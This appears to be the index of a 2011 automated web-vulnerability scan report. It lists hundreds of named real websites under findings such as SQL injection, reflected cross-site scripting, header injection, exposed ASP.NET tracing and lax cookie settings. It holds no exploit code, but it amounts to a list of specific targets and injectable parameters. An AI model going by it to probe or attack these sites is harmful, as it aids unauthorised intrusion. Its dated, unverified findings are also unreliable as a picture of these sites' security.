XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05042011-02

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Wed May 04 10:47:39 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://www.gehealthcare.com/favicon.ico [REST URL parameter 1]

1.2. http://www.next-episode.net/favicon.ico [REST URL parameter 1]

1.3. http://www.spac.org/ [name of an arbitrarily supplied request parameter]

1.4. http://www.spac.org/favicon.ico [name of an arbitrarily supplied request parameter]

1.5. http://www.themonroetimes.com/favicon.ico [User-Agent HTTP header]

1.6. http://www.uiccu.org/favicon.ico [name of an arbitrarily supplied request parameter]

1.7. http://www.zdf.de/favicon.ico [REST URL parameter 1]

2. ASP.NET tracing enabled

2.1. http://www.abbyy.com/trace.axd

2.2. http://www.archildrens.org/trace.axd

2.3. http://www.chartcrafters.com/trace.axd

2.4. http://www.egroupnet.com/trace.axd

2.5. http://www.meadonline.com/trace.axd

3. HTTP PUT enabled

4. HTTP header injection

4.1. http://www.all-sports-uniforms.com/favicon.ico [REST URL parameter 1]

4.2. http://www.criminal-info.com/favicon.ico [REST URL parameter 1]

4.3. http://www.deadcellzones.com/favicon.ico [REST URL parameter 1]

4.4. http://www.phonejobsathome.com/favicon.ico [REST URL parameter 1]

4.5. http://www.ptworkingathome.com/favicon.ico [REST URL parameter 1]

4.6. http://www.resumagic.com/favicon.ico [REST URL parameter 1]

4.7. http://www.solarmovie.com/favicon.ico [REST URL parameter 1]

5. Cross-site scripting (reflected)

5.1. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

5.2. https://tickets.spac.org/TheatreManager/1/login [e parameter]

5.3. http://www.augsburgfortress.org/favicon.ico [REST URL parameter 1]

5.4. http://www.dailyadvance.com/favicon.ico [REST URL parameter 1]

5.5. http://www.egroupnet.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.6. http://www.everydaysource.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.7. http://www.game-spotting.com/favicon.ico [REST URL parameter 1]

5.8. http://www.hummingbirdmoth.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.9. http://www.kiewit.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.10. http://www.michaeljfox.org/favicon.ico [REST URL parameter 1]

5.11. http://www.mycentraloregon.com/favicon.ico [REST URL parameter 1]

5.12. http://www.myfacebooksmileys.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.13. http://www.ntv.ru/favicon.ico [REST URL parameter 1]

5.14. http://www.oldiestelevision.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.15. http://www.paint.net/favicon.ico [name of an arbitrarily supplied request parameter]

5.16. http://www.peoplesgas.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.17. http://www.reverendfun.com/favicon.ico [REST URL parameter 1]

5.18. http://www.rockymounttelegram.com/favicon.ico [REST URL parameter 1]

5.19. http://www.everydentist.com/favicon.ico [Referer HTTP header]

5.20. http://www.idxcentral.com/favicon.ico [Referer HTTP header]

5.21. http://www.wardsci.com/favicon.ico [Referer HTTP header]

5.22. http://www.ammessages6.com/favicon.ico [REST URL parameter 1]

5.23. http://www.ammessages6.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.24. http://www.dbfx.net/favicon.ico [REST URL parameter 1]

5.25. http://www.dbfx.net/favicon.ico [name of an arbitrarily supplied request parameter]

5.26. http://www.herbdoc.com/favicon.ico [REST URL parameter 1]

5.27. http://www.herbdoc.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.28. http://www.mannatech.com/favicon.ico [REST URL parameter 1]

5.29. http://www.mannatech.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.30. http://www.rachelray.com/favicon.ico [REST URL parameter 1]

5.31. http://www.rachelray.com/favicon.ico [name of an arbitrarily supplied request parameter]

6. Flash cross-domain policy

6.1. http://pixel.fetchback.com/crossdomain.xml

6.2. http://www.1888932-2946.ws/crossdomain.xml

6.3. http://www.1iota.com/crossdomain.xml

6.4. http://www.3dvo-models.com/crossdomain.xml

6.5. http://www.55krc.com/crossdomain.xml

6.6. http://www.950kjr.com/crossdomain.xml

6.7. http://www.955thegame.com/crossdomain.xml

6.8. http://www.abc-7.com/crossdomain.xml

6.9. http://www.activitytv.com/crossdomain.xml

6.10. http://www.adjack.net/crossdomain.xml

6.11. http://www.admaximizer.com/crossdomain.xml

6.12. http://www.advancedministry.com/crossdomain.xml

6.13. http://www.affiliatecashpile.net/crossdomain.xml

6.14. http://www.aids.gov/crossdomain.xml

6.15. http://www.airbus.com/crossdomain.xml

6.16. http://www.alpha-vip.com/crossdomain.xml

6.17. http://www.bacardimojito.com/crossdomain.xml

6.18. http://www.barafranca.com/crossdomain.xml

6.19. http://www.bestvehicle4you.com/crossdomain.xml

6.20. http://www.bluestraveler.com/crossdomain.xml

6.21. http://www.bodybymilk.com/crossdomain.xml

6.22. http://www.booster-ads.com/crossdomain.xml

6.23. http://www.box24casino.com/crossdomain.xml

6.24. http://www.bunte.de/crossdomain.xml

6.25. http://www.buzzine.com/crossdomain.xml

6.26. http://www.chathambarsinn.com/crossdomain.xml

6.27. http://www.cnet.co.uk/crossdomain.xml

6.28. http://www.country925.com/crossdomain.xml

6.29. http://www.cpanel.net/crossdomain.xml

6.30. http://www.cyclechaos.com/crossdomain.xml

6.31. http://www.dailyhome.com/crossdomain.xml

6.32. http://www.davincisurgery.com/crossdomain.xml

6.33. http://www.dddnews.com/crossdomain.xml

6.34. http://www.dealercrm.com/crossdomain.xml

6.35. http://www.dezercollection.com/crossdomain.xml

6.36. http://www.dovogame.com/crossdomain.xml

6.37. http://www.egroupnet.com/crossdomain.xml

6.38. http://www.emol.com/crossdomain.xml

6.39. http://www.empoweringparents.com/crossdomain.xml

6.40. http://www.everywherechat.com/crossdomain.xml

6.41. http://www.eye-make-up-tips.com/crossdomain.xml

6.42. http://www.ezfolk.com/crossdomain.xml

6.43. http://www.financesate.com/crossdomain.xml

6.44. http://www.flor.com/crossdomain.xml

6.45. http://www.funkitron.com/crossdomain.xml

6.46. http://www.gamekult.com/crossdomain.xml

6.47. http://www.georgeharrison.com/crossdomain.xml

6.48. http://www.glidden.com/crossdomain.xml

6.49. http://www.gosupermodel.com/crossdomain.xml

6.50. http://www.healthzone.ca/crossdomain.xml

6.51. http://www.homehealthplanet.com/crossdomain.xml

6.52. http://www.hot1079.com/crossdomain.xml

6.53. http://www.hudong.com/crossdomain.xml

6.54. http://www.iconaircraft.com/crossdomain.xml

6.55. http://www.incontention.com/crossdomain.xml

6.56. http://www.instantpresenter.com/crossdomain.xml

6.57. http://www.irenewdemos.com/crossdomain.xml

6.58. http://www.itworld.com/crossdomain.xml

6.59. http://www.jcosplay.com/crossdomain.xml

6.60. http://www.jewishxdate.com/crossdomain.xml

6.61. http://www.jhunewsletter.com/crossdomain.xml

6.62. http://www.kansasspeedway.com/crossdomain.xml

6.63. http://www.karafun.com/crossdomain.xml

6.64. http://www.kedscollective.com/crossdomain.xml

6.65. http://www.keyhealthclub.com/crossdomain.xml

6.66. http://www.kiss107.com/crossdomain.xml

6.67. http://www.kissfunny.com/crossdomain.xml

6.68. http://www.learningcurve.com/crossdomain.xml

6.69. http://www.legalseafoods.com/crossdomain.xml

6.70. http://www.localfordoffer.com/crossdomain.xml

6.71. http://www.machomoe.com/crossdomain.xml

6.72. http://www.madtwist.com/crossdomain.xml

6.73. http://www.marcjacobs.com/crossdomain.xml

6.74. http://www.matchbox.com/crossdomain.xml

6.75. http://www.mediapost.com/crossdomain.xml

6.76. http://www.mertado.com/crossdomain.xml

6.77. http://www.michellebranch.com/crossdomain.xml

6.78. http://www.mix961.com/crossdomain.xml

6.79. http://www.mofuse.com/crossdomain.xml

6.80. http://www.mountainrailwv.com/crossdomain.xml

6.81. http://www.moxieteenz.com/crossdomain.xml

6.82. http://www.myfoxlubbock.com/crossdomain.xml

6.83. http://www.n9negroup.com/crossdomain.xml

6.84. http://www.needstosell.com/crossdomain.xml

6.85. http://www.netscrap.com/crossdomain.xml

6.86. http://www.nevershoutnever.com/crossdomain.xml

6.87. http://www.newschannel34.com/crossdomain.xml

6.88. http://www.nextbus.com/crossdomain.xml

6.89. http://www.nfb.ca/crossdomain.xml

6.90. http://www.ntv.ru/crossdomain.xml

6.91. http://www.officialsanctuary.com/crossdomain.xml

6.92. http://www.openfilm.com/crossdomain.xml

6.93. http://www.ovm.org/crossdomain.xml

6.94. http://www.percyjacksonbooks.com/crossdomain.xml

6.95. http://www.performgroup.com/crossdomain.xml

6.96. http://www.phoneofvoip.com/crossdomain.xml

6.97. http://www.photofunia.com/crossdomain.xml

6.98. http://www.pirelli.com/crossdomain.xml

6.99. http://www.pratttribune.com/crossdomain.xml

6.100. http://www.primusville.com/crossdomain.xml

6.101. http://www.puuko.com/crossdomain.xml

6.102. http://www.quakersteakandlube.com/crossdomain.xml

6.103. http://www.radiofarda.com/crossdomain.xml

6.104. http://www.realore.com/crossdomain.xml

6.105. http://www.ringtonekey.com/crossdomain.xml

6.106. http://www.sanmanuel.com/crossdomain.xml

6.107. http://www.semilo.com/crossdomain.xml

6.108. http://www.silkpurealmond.com/crossdomain.xml

6.109. http://www.skittles.com/crossdomain.xml

6.110. http://www.slizone.com/crossdomain.xml

6.111. http://www.smalldressup.com/crossdomain.xml

6.112. http://www.smucker.com/crossdomain.xml

6.113. http://www.sooeveningnews.com/crossdomain.xml

6.114. http://www.startlap.hu/crossdomain.xml

6.115. http://www.stream.cz/crossdomain.xml

6.116. http://www.terrypaton.com/crossdomain.xml

6.117. http://www.thecoastalsource.com/crossdomain.xml

6.118. http://www.trade2finance.com/crossdomain.xml

6.119. http://www.tv5.org/crossdomain.xml

6.120. http://www.ucanbuyme.com/crossdomain.xml

6.121. http://www.uhc-networkbulletin.com/crossdomain.xml

6.122. http://www.ussoccer.com/crossdomain.xml

6.123. http://www.vdopia.com/crossdomain.xml

6.124. http://www.versuscountrybagamonsterbuck.com/crossdomain.xml

6.125. http://www.visitpensacola.com/crossdomain.xml

6.126. http://www.wandtv.com/crossdomain.xml

6.127. http://www.washfm.com/crossdomain.xml

6.128. http://www.watfordoutlet.com/crossdomain.xml

6.129. http://www.weallwantsomeone.org/crossdomain.xml

6.130. http://www.weddingdecor.com/crossdomain.xml

6.131. http://www.werelate.org/crossdomain.xml

6.132. http://www.wlns.com/crossdomain.xml

6.133. http://www.wmji.com/crossdomain.xml

6.134. http://www.xpmedia.com/crossdomain.xml

6.135. http://www.yorkpress.co.uk/crossdomain.xml

6.136. http://www.yougamers.com/crossdomain.xml

6.137. http://www.youtongue.com/crossdomain.xml

6.138. http://www.zdf.de/crossdomain.xml

6.139. http://www.adam4cams.com/crossdomain.xml

6.140. http://www.adtotal.pl/crossdomain.xml

6.141. http://www.allaccess.com.ph/crossdomain.xml

6.142. http://www.artistrising.com/crossdomain.xml

6.143. http://www.bikerplanet.com/crossdomain.xml

6.144. http://www.bmwmotorcycles.com/crossdomain.xml

6.145. http://www.bookfresh.com/crossdomain.xml

6.146. http://www.brockport.edu/crossdomain.xml

6.147. http://www.bullionvault.com/crossdomain.xml

6.148. http://www.camscape.com/crossdomain.xml

6.149. http://www.cashfiesta.com/crossdomain.xml

6.150. http://www.columbuslocalnews.com/crossdomain.xml

6.151. http://www.contentedits.com/crossdomain.xml

6.152. http://www.cybermonday.com/crossdomain.xml

6.153. http://www.dailyadvance.com/crossdomain.xml

6.154. http://www.dana.org/crossdomain.xml

6.155. http://www.deathpenaltyinfo.org/crossdomain.xml

6.156. http://www.dundermifflininfinity.com/crossdomain.xml

6.157. http://www.film4.com/crossdomain.xml

6.158. http://www.foxsportsmidwest.com/crossdomain.xml

6.159. http://www.goldaffiliateprogram.com/crossdomain.xml

6.160. http://www.golfholiday.com/crossdomain.xml

6.161. http://www.hutchnews.com/crossdomain.xml

6.162. http://www.icelandair.is/crossdomain.xml

6.163. http://www.ifamouz.com/crossdomain.xml

6.164. http://www.imbc.com/crossdomain.xml

6.165. http://www.indavideo.hu/crossdomain.xml

6.166. http://www.intermediaoutdoors.com/crossdomain.xml

6.167. http://www.junodownload.com/crossdomain.xml

6.168. http://www.kboi2.com/crossdomain.xml

6.169. http://www.keepbusy.net/crossdomain.xml

6.170. http://www.keprtv.com/crossdomain.xml

6.171. http://www.kerrang.com/crossdomain.xml

6.172. http://www.kimatv.com/crossdomain.xml

6.173. http://www.lakewood.cc/crossdomain.xml

6.174. http://www.ldssingles.com/crossdomain.xml

6.175. http://www.livedoor.biz/crossdomain.xml

6.176. http://www.livemanplay.com/crossdomain.xml

6.177. http://www.luckymn.com/crossdomain.xml

6.178. http://www.manoramaonline.com/crossdomain.xml

6.179. http://www.menshealth.co.uk/crossdomain.xml

6.180. http://www.mkt859.com/crossdomain.xml

6.181. http://www.moikrewni.pl/crossdomain.xml

6.182. http://www.mygazines.com/crossdomain.xml

6.183. http://www.neogen.ro/crossdomain.xml

6.184. http://www.newtondailynews.com/crossdomain.xml

6.185. http://www.onntv.com/crossdomain.xml

6.186. http://www.onthesnow.com/crossdomain.xml

6.187. http://www.optionmonster.com/crossdomain.xml

6.188. http://www.paperwishes.com/crossdomain.xml

6.189. http://www.permissionresearch.com/crossdomain.xml

6.190. http://www.photodex.com/crossdomain.xml

6.191. http://www.picturesongold.com/crossdomain.xml

6.192. http://www.playspan.com/crossdomain.xml

6.193. http://www.plejada.pl/crossdomain.xml

6.194. http://www.prodigy.com/crossdomain.xml

6.195. http://www.ptc.com/crossdomain.xml

6.196. http://www.putnam.com/crossdomain.xml

6.197. http://www.quickhit.com/crossdomain.xml

6.198. http://www.rccaraction.com/crossdomain.xml

6.199. http://www.redbull.com/crossdomain.xml

6.200. http://www.revelex.com/crossdomain.xml

6.201. http://www.riddell.com/crossdomain.xml

6.202. http://www.rockymounttelegram.com/crossdomain.xml

6.203. http://www.rydercup.com/crossdomain.xml

6.204. http://www.salemkeizer.org/crossdomain.xml

6.205. http://www.saljournal.com/crossdomain.xml

6.206. http://www.sherwin.com/crossdomain.xml

6.207. http://www.shopstyle.co.uk/crossdomain.xml

6.208. http://www.smiliegames.com/crossdomain.xml

6.209. http://www.snponline.com/crossdomain.xml

6.210. http://www.soundsnap.com/crossdomain.xml

6.211. http://www.startrekonline.com/crossdomain.xml

6.212. http://www.swissotel.com/crossdomain.xml

6.213. http://www.teoriza.com/crossdomain.xml

6.214. http://www.theconsumerwinner.com/crossdomain.xml

6.215. http://www.thedailyworld.com/crossdomain.xml

6.216. http://www.timetospa.com/crossdomain.xml

6.217. http://www.toryburch.com/crossdomain.xml

6.218. http://www.tripadvisor.fr/crossdomain.xml

6.219. http://www.tripadvisor.ie/crossdomain.xml

6.220. http://www.tudiscoverykids.com/crossdomain.xml

6.221. http://www.tuenti.com/crossdomain.xml

6.222. http://www.vanderbilthealth.com/crossdomain.xml

6.223. http://www.vk.com/crossdomain.xml

6.224. http://www.wbez.org/crossdomain.xml

6.225. http://www.wokv.com/crossdomain.xml

6.226. http://www.yogabbagabba.com/crossdomain.xml

6.227. http://www.artofdrink.com/crossdomain.xml

6.228. http://www.atat.ro/crossdomain.xml

6.229. http://www.athensmessenger.com/crossdomain.xml

6.230. http://www.austrian.com/crossdomain.xml

6.231. http://www.awana.org/crossdomain.xml

6.232. http://www.biblemoneymatters.com/crossdomain.xml

6.233. http://www.bluechipcasino.com/crossdomain.xml

6.234. http://www.ccci.org/crossdomain.xml

6.235. http://www.computer-juice.com/crossdomain.xml

6.236. http://www.digidesign.com/crossdomain.xml

6.237. http://www.dreammakerhotdogcarts.com/crossdomain.xml

6.238. http://www.ebarrelracing.com/crossdomain.xml

6.239. http://www.english-at-home.com/crossdomain.xml

6.240. http://www.euro-fight-girls.com/crossdomain.xml

6.241. http://www.frick.org/crossdomain.xml

6.242. http://www.indiainfo.com/crossdomain.xml

6.243. http://www.justborn.com/crossdomain.xml

6.244. http://www.lakegenevawi.com/crossdomain.xml

6.245. http://www.lightstalkers.org/crossdomain.xml

6.246. http://www.moviegator.com/crossdomain.xml

6.247. http://www.nhk.or.jp/crossdomain.xml

6.248. http://www.npgdigital.net/crossdomain.xml

6.249. http://www.peninsula.com/crossdomain.xml

6.250. http://www.peppermillreno.com/crossdomain.xml

6.251. http://www.ppstream.com/crossdomain.xml

6.252. http://www.recordingreview.com/crossdomain.xml

6.253. http://www.rockport.com/crossdomain.xml

6.254. http://www.safefiles.net/crossdomain.xml

6.255. http://www.stingrayboats.com/crossdomain.xml

6.256. http://www.thedigitel.com/crossdomain.xml

6.257. http://www.thewesterlysun.com/crossdomain.xml

6.258. http://www.timesleaderautos.com/crossdomain.xml

6.259. http://www.traceadkins.com/crossdomain.xml

6.260. http://www.tumblebooks.com/crossdomain.xml

6.261. http://www.waterwizz.com/crossdomain.xml

6.262. http://www.wmicentral.com/crossdomain.xml

6.263. http://www.wrapcandy.com/crossdomain.xml

7. SSL cookie without secure flag set

7.1. https://uwwins.uww.edu/psp/uwwins/

7.2. https://tickets.spac.org/TheatreManager/1/login

7.3. https://tickets.spac.org/TheatreManager/1/login&event=0

7.4. https://tickets.spac.org/TheatreManager/1/online

7.5. https://tickets.spac.org/TheatreManager/1/tmEvent/tmEvent51.html

7.6. https://uwwins.uww.edu/favicon.ico

7.7. https://uwwins.uww.edu/uwwins/signon.html

7.8. https://uwwins.uww.edu/uwwins/uwwmod/arrow.gif

7.9. https://uwwins.uww.edu/uwwins/uwwmod/header_p.jpg

7.10. https://uwwins.uww.edu/uwwins/uwwmod/styleuww.css

7.11. https://uwwins.uww.edu/uwwins/uwwmod/top_bkgrnd.jpg

8. Session token in URL

8.1. https://password.uww.edu/IDMProv/portal/cn/GuestContainerPage/Welcome

8.2. http://www.wbez.org/favicon.ico

9. ASP.NET ViewState without MAC enabled

10. Open redirection

11. Cookie scoped to parent domain

11.1. https://uwwins.uww.edu/psp/uwwins/

11.2. http://www.legalseafoods.com/favicon.ico

11.3. http://www.michaeljfox.org/favicon.ico

11.4. http://www.putnam.com/favicon.ico

11.5. http://www.wbez.org/favicon.ico

11.6. http://pixel.fetchback.com/serve/fb/pdc

11.7. http://pixel.fetchback.com/serve/fb/uat

11.8. http://www.alexandriava.gov/favicon.ico

11.9. http://www.animetoplist.org/favicon.ico

11.10. http://www.baptist411.com/favicon.ico

11.11. http://www.camprate.com/favicon.ico

11.12. http://www.dada.it/favicon.ico

11.13. http://www.imo.im/favicon.ico

11.14. http://www.ntu.edu.tw/favicon.ico

11.15. http://www.onlineaccess.ca/favicon.ico

11.16. http://www.skoosh.com/favicon.ico

11.17. http://www.soultracks.com/favicon.ico

11.18. http://www.thyroidsolutionbook.com/favicon.ico

11.19. http://www.unfranchise.com/favicon.ico

12. Cookie without HttpOnly flag set

12.1. https://password.uww.edu/IDMProv/

12.2. http://www.1045thezone.com/favicon.ico

12.3. http://www.1888932-2946.ws/favicon.ico

12.4. http://www.599fashion.com/favicon.ico

12.5. http://www.advancedministry.com/favicon.ico

12.6. http://www.alexandriava.gov/favicon.ico

12.7. http://www.automatedfinancial.com/favicon.ico

12.8. http://www.bookmarki.com/favicon.ico

12.9. http://www.bradleyschools.org/favicon.ico

12.10. http://www.brasslight.com/favicon.ico

12.11. http://www.breastimplants411.com/favicon.ico

12.12. http://www.bullionvault.com/favicon.ico

12.13. http://www.caribbeancruisediscounts.com/favicon.ico

12.14. http://www.casinolistserve.com/favicon.ico

12.15. http://www.christinagowns.com/favicon.ico

12.16. http://www.clairemurray.com/favicon.ico

12.17. http://www.cricketmag.com/favicon.ico

12.18. http://www.crossdresser.com/favicon.ico

12.19. http://www.crossroadsrv.com/favicon.ico

12.20. http://www.dotoledo.org/favicon.ico

12.21. http://www.eacu.org/favicon.ico

12.22. http://www.easysite.com/favicon.ico

12.23. http://www.egroupnet.com/favicon.ico

12.24. http://www.esc11.net/favicon.ico

12.25. http://www.everlifememorials.com/favicon.ico

12.26. http://www.everydentist.com/favicon.ico

12.27. http://www.ezlegalfile.org/favicon.ico

12.28. http://www.fineartstudioonline.com/favicon.ico

12.29. http://www.first-state.net/favicon.ico

12.30. http://www.frontrowcentre.com/favicon.ico

12.31. http://www.fullerdirect.com/favicon.ico

12.32. http://www.gameroccupation.com/favicon.ico

12.33. http://www.garlandisd.net/favicon.ico

12.34. http://www.gradespeed.net/favicon.ico

12.35. http://www.greenfarmtoys.com/favicon.ico

12.36. http://www.hollywoodpresbyterian.com/favicon.ico

12.37. http://www.hotbooksale.com/favicon.ico

12.38. http://www.houseneeds.com/favicon.ico

12.39. http://www.hummingbird.org/favicon.ico

12.40. http://www.idriveonline.com/favicon.ico

12.41. http://www.idxcentral.com/favicon.ico

12.42. http://www.ingurgitationdive.com/favicon.ico

12.43. http://www.karyonres.travel/favicon.ico

12.44. http://www.kiewit.com/favicon.ico

12.45. http://www.killermotorsports.com/favicon.ico

12.46. http://www.lasvegasnevada.gov/favicon.ico

12.47. http://www.legalseafoods.com/favicon.ico

12.48. http://www.madd.org/favicon.ico

12.49. http://www.marmishoes.com/favicon.ico

12.50. http://www.mcneel.com/favicon.ico

12.51. http://www.michaeljfox.org/favicon.ico

12.52. http://www.mjpjobsearch.com/favicon.ico

12.53. http://www.mobileballot.com/favicon.ico

12.54. http://www.moxieteenz.com/favicon.ico

12.55. http://www.mwsu.edu/favicon.ico

12.56. http://www.n9negroup.com/favicon.ico

12.57. http://www.ngk.com/favicon.ico

12.58. http://www.ovbc.com/favicon.ico

12.59. http://www.panpacific.com/favicon.ico

12.60. http://www.peoplesgas.com/favicon.ico

12.61. http://www.prohoists.com/favicon.ico

12.62. http://www.putnam.com/favicon.ico

12.63. http://www.revelex.com/favicon.ico

12.64. http://www.scanaenergy.com/favicon.ico

12.65. http://www.sentry.com/favicon.ico

12.66. http://www.stockingstore.com/favicon.ico

12.67. http://www.supplierlist.com/favicon.ico

12.68. http://www.themonroetimes.com/favicon.ico

12.69. http://www.thetrustees.org/favicon.ico

12.70. http://www.theworldreserve.com/favicon.ico

12.71. http://www.vermonttoday.com/favicon.ico

12.72. http://www.virgul.com/favicon.ico

12.73. http://www.vistawholesale.com/favicon.ico

12.74. http://www.wardsci.com/favicon.ico

12.75. http://www.wbez.org/favicon.ico

12.76. http://www.y12fcu.org/favicon.ico

12.77. http://pixel.fetchback.com/serve/fb/pdc

12.78. http://pixel.fetchback.com/serve/fb/uat

12.79. https://tickets.spac.org/TheatreManager/1/login

12.80. https://tickets.spac.org/TheatreManager/1/login&event=0

12.81. https://tickets.spac.org/TheatreManager/1/online

12.82. https://tickets.spac.org/TheatreManager/1/tmEvent/tmEvent51.html

12.83. https://uwwins.uww.edu/favicon.ico

12.84. https://uwwins.uww.edu/psp/uwwins/

12.85. https://uwwins.uww.edu/uwwins/signon.html

12.86. https://uwwins.uww.edu/uwwins/uwwmod/arrow.gif

12.87. https://uwwins.uww.edu/uwwins/uwwmod/header_p.jpg

12.88. https://uwwins.uww.edu/uwwins/uwwmod/styleuww.css

12.89. https://uwwins.uww.edu/uwwins/uwwmod/top_bkgrnd.jpg

12.90. http://www.955thegame.com/favicon.ico

12.91. http://www.acnecomplex.com/favicon.ico

12.92. http://www.acnwireless.com/favicon.ico

12.93. http://www.adtotal.pl/favicon.ico

12.94. http://www.adventurefinder.com/favicon.ico

12.95. http://www.airbus.com/favicon.ico

12.96. http://www.amazinggracecatz.com/favicon.ico

12.97. http://www.animetoplist.org/favicon.ico

12.98. http://www.autogrids.com/favicon.ico

12.99. http://www.baptist411.com/favicon.ico

12.100. http://www.berkshirebank.com/favicon.ico

12.101. http://www.beverlyhills.org/favicon.ico

12.102. http://www.biggestloser.com/favicon.ico

12.103. http://www.blogo.it/favicon.ico

12.104. http://www.bofa.com/favicon.ico

12.105. http://www.boozallen-jobs.com/favicon.ico

12.106. http://www.bpiexpressonline.com/favicon.ico

12.107. http://www.byutv.org/favicon.ico

12.108. http://www.call-text-2-schedule-in-or-outcall.com/favicon.ico

12.109. http://www.camprate.com/favicon.ico

12.110. http://www.camryforums.com/favicon.ico

12.111. http://www.cancerquest.org/favicon.ico

12.112. http://www.carfaxonline.com/favicon.ico

12.113. http://www.caribbeanportreviews.com/favicon.ico

12.114. http://www.casesandmore.com/favicon.ico

12.115. http://www.chartercabledeals.com/favicon.ico

12.116. http://www.cigar.com/favicon.ico

12.117. http://www.coffesshopreadin.com/favicon.ico

12.118. http://www.coxcableoffers.net/favicon.ico

12.119. http://www.dada.it/favicon.ico

12.120. http://www.dana.org/favicon.ico

12.121. http://www.dealercrm.com/favicon.ico

12.122. http://www.dealerinventoryonline.com/favicon.ico

12.123. http://www.deniseaustin.com/favicon.ico

12.124. http://www.dicksteinshapiro.com/favicon.ico

12.125. http://www.digidesign.com/favicon.ico

12.126. http://www.domesticviolence.org/favicon.ico

12.127. http://www.dooyoo.de/favicon.ico

12.128. http://www.ecampustours.com/favicon.ico

12.129. http://www.emotorpro.com/favicon.ico

12.130. http://www.enewsclub.com/favicon.ico

12.131. http://www.everydaysource.com/favicon.ico

12.132. http://www.everyslipcover.com/favicon.ico

12.133. http://www.flashseats.com/favicon.ico

12.134. http://www.getthejob.com/favicon.ico

12.135. http://www.glamourboutique.com/favicon.ico

12.136. http://www.gm-apps.com/favicon.ico

12.137. http://www.goodyearep.com/favicon.ico

12.138. http://www.gospial.com/favicon.ico

12.139. http://www.govvacationrewards.com/favicon.ico

12.140. http://www.gozaic.com/favicon.ico

12.141. http://www.greystar.com/favicon.ico

12.142. http://www.hbu.edu/favicon.ico

12.143. http://www.hdasonline.com/favicon.ico

12.144. http://www.hdsupplysolutions.com/favicon.ico

12.145. http://www.hercjobs.org/favicon.ico

12.146. http://www.homeoffice.gov.uk/favicon.ico

12.147. http://www.hutchnews.com/favicon.ico

12.148. http://www.icelandair.is/favicon.ico

12.149. http://www.imb.org/favicon.ico

12.150. http://www.imo.im/favicon.ico

12.151. http://www.insurancebroadcasting.com/favicon.ico

12.152. http://www.intermatic.com/favicon.ico

12.153. http://www.itravel2000.com/favicon.ico

12.154. http://www.itworld.com/favicon.ico

12.155. http://www.izodcenter.com/favicon.ico

12.156. http://www.kansascitysteaks.com/favicon.ico

12.157. http://www.ki4u.com/favicon.ico

12.158. http://www.kiefer.com/favicon.ico

12.159. http://www.kusc.org/favicon.ico

12.160. http://www.landroverforums.com/favicon.ico

12.161. http://www.lcs.net/favicon.ico

12.162. http://www.lillenas.com/favicon.ico

12.163. http://www.lookfantastic.com/favicon.ico

12.164. http://www.lvhilton.com/favicon.ico

12.165. http://www.m-audio.com/favicon.ico

12.166. http://www.mandarinoriental.com/favicon.ico

12.167. http://www.manilatimes.net/favicon.ico

12.168. http://www.matchbox.com/favicon.ico

12.169. http://www.mattycollector.com/favicon.ico

12.170. http://www.mitsubishiforum.com/favicon.ico

12.171. http://www.mnyscherc.org/favicon.ico

12.172. http://www.moneris.com/favicon.ico

12.173. http://www.mylifescoop.com/favicon.ico

12.174. http://www.mypovgf.com/favicon.ico

12.175. http://www.mytaratata.com/favicon.ico

12.176. http://www.naacp.com/favicon.ico

12.177. http://www.namenda.com/favicon.ico

12.178. http://www.nextbus.com/favicon.ico

12.179. http://www.nfb.ca/favicon.ico

12.180. http://www.npd.com/favicon.ico

12.181. http://www.odysseycruises.com/favicon.ico

12.182. http://www.ohchr.org/favicon.ico

12.183. http://www.onlineaccess.ca/favicon.ico

12.184. http://www.orencia.com/favicon.ico

12.185. http://www.paginasamarillas.com/favicon.ico

12.186. http://www.paydaypickup.com/favicon.ico

12.187. http://www.pbclibrary.org/favicon.ico

12.188. http://www.pnconcampus.com/favicon.ico

12.189. http://www.preguntaahora.com/favicon.ico

12.190. http://www.primo-path.com/favicon.ico

12.191. http://www.psoriasisanswers.com/favicon.ico

12.192. http://www.ptc.com/favicon.ico

12.193. http://www.readingclubos.com/favicon.ico

12.194. http://www.reedssports.com/favicon.ico

12.195. http://www.reliablehardware.com/favicon.ico

12.196. http://www.rinovelty.com/favicon.ico

12.197. http://www.riversidenb.com/favicon.ico

12.198. http://www.saljournal.com/favicon.ico

12.199. http://www.samsclubchecks.com/favicon.ico

12.200. http://www.santamonicapier.org/favicon.ico

12.201. http://www.search-light.net/favicon.ico

12.202. http://www.searsopticalcontacts.com/favicon.ico

12.203. http://www.seattlecca.org/favicon.ico

12.204. http://www.secondchancedegrees.com/favicon.ico

12.205. http://www.shazam.com/favicon.ico

12.206. http://www.skoosh.com/favicon.ico

12.207. http://www.smilefacts.com/favicon.ico

12.208. http://www.snelling.com/favicon.ico

12.209. http://www.socalherc.org/favicon.ico

12.210. http://www.soultracks.com/favicon.ico

12.211. http://www.starkjobs.com/favicon.ico

12.212. http://www.thelaminateflooringsite.com/favicon.ico

12.213. http://www.theliteracysite.com/favicon.ico

12.214. http://www.theportableaudiocatalog.com/favicon.ico

12.215. http://www.thesocialnetwork-movie.com/favicon.ico

12.216. http://www.thyroidsolutionbook.com/favicon.ico

12.217. http://www.tottenhamhotspur.com/favicon.ico

12.218. http://www.tumbleweedrestaurants.com/favicon.ico

12.219. http://www.unfranchise.com/favicon.ico

12.220. http://www.vanheusenrewards.com/favicon.ico

12.221. http://www.vfsolutions.com/favicon.ico

12.222. http://www.visi.com/favicon.ico

12.223. http://www.visiteurope.com/favicon.ico

12.224. http://www.wmgk.com/favicon.ico

13. Password field with autocomplete enabled

13.1. https://desire2learn.uww.edu/

13.2. https://password.uww.edu/IDMProv/jsps/login/Login.jsp

13.3. http://www.everydaysource.com/favicon.ico

14. Source code disclosure

15. ASP.NET debugging enabled

15.1. http://www.123rank.com/Default.aspx

15.2. http://www.1iota.com/Default.aspx

